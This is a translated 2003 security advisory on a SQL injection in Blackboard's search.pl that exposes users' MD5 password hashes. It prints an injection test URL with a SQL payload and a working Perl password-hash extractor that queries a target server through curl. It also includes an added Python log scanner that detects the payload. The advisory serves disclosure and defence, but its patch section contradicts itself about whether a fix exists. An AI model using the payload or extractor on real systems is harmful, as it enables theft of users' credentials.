Blackboard Learning System search.pl SQL Injection Vulnerability

Published: 2003-01-21
Updated: 2003-01-25

Affected systems:
Blackboard Blackboard 5.5.1
Blackboard Blackboard 5.5
Blackboard Blackboard 5.0.2
Blackboard Blackboard 5.0
Description:
BUGTRAQ ID: 6655

Blackboard is an online solution that provides academic, administrative, community and other educational services.

Blackboard does not sufficiently filter user-supplied input. A remote attacker can exploit this vulnerability to query the Blackboard user directory without authorization and obtain the MD5 password hashes of arbitrary users, among other malicious activity.

The search script '/bin/common/search.pl' shipped with the system does not correctly filter the parameters submitted by the user. By supplying malicious SQL in the '&by' parameter, an attacker can alter the logic of the original SQL query and retrieve the MD5 password hash or directory information of any user. That information can then be used to attack the system further.
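As an added example (not part of the advisory or of Blackboard's own code), the Python check below scans constructed web-server access-log lines for requests to search.pl whose `by` parameter is anything other than a bare column name, which is the shape the injection described above takes. The allowlist of directory field names is an assumption, since the real set of permitted values is not given here.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Directory fields a legitimate '&by=' value may name. Assumption: Blackboard's
# real set is not on the advisory page; this is an illustrative allowlist.
ALLOWED_BY = {"lastname", "firstname", "username", "email"}
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")

# Common Log Format: client, identd, user, [timestamp], "METHOD path proto", status, bytes
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample log lines (not real traffic). The second carries the
# payload shape from the advisory, percent-encoded as a web server would log it.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Jan/2003:10:00:01 -0500] "GET /bin/common/search.pl'
    '?action=RESULTS&context=USERDIR&type=SEARCH&operation=VIEW'
    '&keyword=smith&keywordraw=&by=lastname HTTP/1.0" 200 5120',
    '10.0.0.9 - - [21/Jan/2003:10:00:07 -0500] "GET /bin/common/search.pl'
    '?action=RESULTS&context=USERDIR&type=SEARCH&operation=VIEW&keyword=meow'
    '&keywordraw=&by=passwd)%20LIKE%20%27%25%25%27%20AND%20U.system_role'
    '%20=%20%27t%27%20AND%20upper(U.passwd HTTP/1.0" 200 8891',
    '10.0.0.6 - - [21/Jan/2003:10:00:09 -0500] "GET /bin/common/search.pl'
    '?action=RESULTS&context=USERDIR&by=passwd HTTP/1.0" 200 4410',
    '10.0.0.7 - - [21/Jan/2003:10:00:12 -0500] "GET /bin/common/login.pl HTTP/1.0" 200 1200',
]


def check_request(path):
    """Return a reason if a search.pl request's 'by' value is suspicious, else None."""
    parts = urlsplit(path)
    if not parts.path.endswith("/bin/common/search.pl"):
        return None
    # parse_qs percent-decodes values, so "passwd)%20LIKE..." is inspected as SQL text.
    for by in parse_qs(parts.query, keep_blank_values=True).get("by", []):
        if by.lower() in ALLOWED_BY:
            continue
        if not IDENT.match(by):
            return f"by={by!r} is not a bare identifier"
        return f"by={by!r} not in allowlist"
    return None


def scan_log(lines):
    """Return a list of (client_ip, reason) for every log line that fails check_request."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            reason = check_request(m["path"])
            if reason:
                findings.append((m["ip"], reason))
    return findings
```

Running `scan_log(SAMPLE_LOG)` flags the injected request as a non-identifier and the bare `by=passwd` request as an allowlist miss, while the legitimate search and the unrelated login.pl request pass.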

<*Source: Pedram Amini (pedram.amini@tulane.edu)

  Link: http://pedram.redhive.com/advisories/blackboard5.txt
*>

Test method:

Warning

The following programs (methods) may be offensive in nature and are provided solely for security research and teaching. Use at your own risk!

Pedram Amini (pedram.amini@tulane.edu) provided the following test method:

/bin/common/search.pl?action=RESULTS
                         &context=USERDIR
                         &type=SEARCH
                         &operation=VIEW
                         &keyword=meow
                         &keywordraw=
                         &by=passwd) LIKE '%%' AND U.system_role = 't' AND upper(U.passwd

Test script:

#!/usr/bin/perl -w

#
# Blackboard Password Extractor
#
# pedram amini <http://pedram.redhive.com>
#
# - refer to the advisory for usage.
# - requires curl.
# - can be easily further automated.
#

# set these:
$password   = "abcd";                   # initial "narrow down" password.
$session_id = "\@\@123456abcd....";     # current valid session id.
$host       = "blackboard.xxxxx.xxx";   # target blackboard server.
$grep_for   = "lastname";               # target we're looking for.

# don't forget to comment out either the working forwards or backwards lines.

@chars = ('0', '1', '2', '3', '4', '5', '6', '7',
          '8', '9', 'a', 'b', 'c', 'd', 'e', 'f');

$url = "http://$host/bin/common/search.pl?action=RESULTS&context=USERDIR&type=SEARCH&operation=VIEW&keyword=MEOW&keywordraw=_SENTINAL_&by=passwd";
$url =~ s/&/\\&/g;

for ($keep_looking = 1; $keep_looking != 0; ) {
    for ($i = 0; $i <= $#chars; $i++) {
        # working forwards:
        #$cur_pass = $password . $chars[$i];

        # working backwards:
        #$cur_pass = $chars[$i] . $password;

        $cur_url  = $url;
        $cur_url  =~ s/_SENTINAL_/$cur_pass/;

        print "\n --> working  ... $chars[$i]";

        $return = `curl --cookie session_id=$session_id $cur_url 2> /dev/null | grep -i $grep_for | wc -l`;
        $return =~ s/\s//g;

        print "\n --> returned ... $return";

        if ($return) {
            print "\n --> next char found: $chars[$i]";

            # working forwards:
            #$password .= $chars[$i];

            # working backwards:
            #$password = $chars[$i] . $password;

            $keep_looking = 1;
            $i = $#chars;
        } else {
            $keep_looking = 0;
        }

        sleep 1;
    }
    print "\n --> current password ... $password";
}

Recommendations:
Vendor patch:

Blackboard
----------
The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:

Blackboard will release a security patch in the near future to fix this vulnerability; users can contact the vendor for details.

Blackboard product support hotline:

1-888-788-5264

Or submit a service request through the web site:

http://company.blackboard.com/

This vulnerability was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.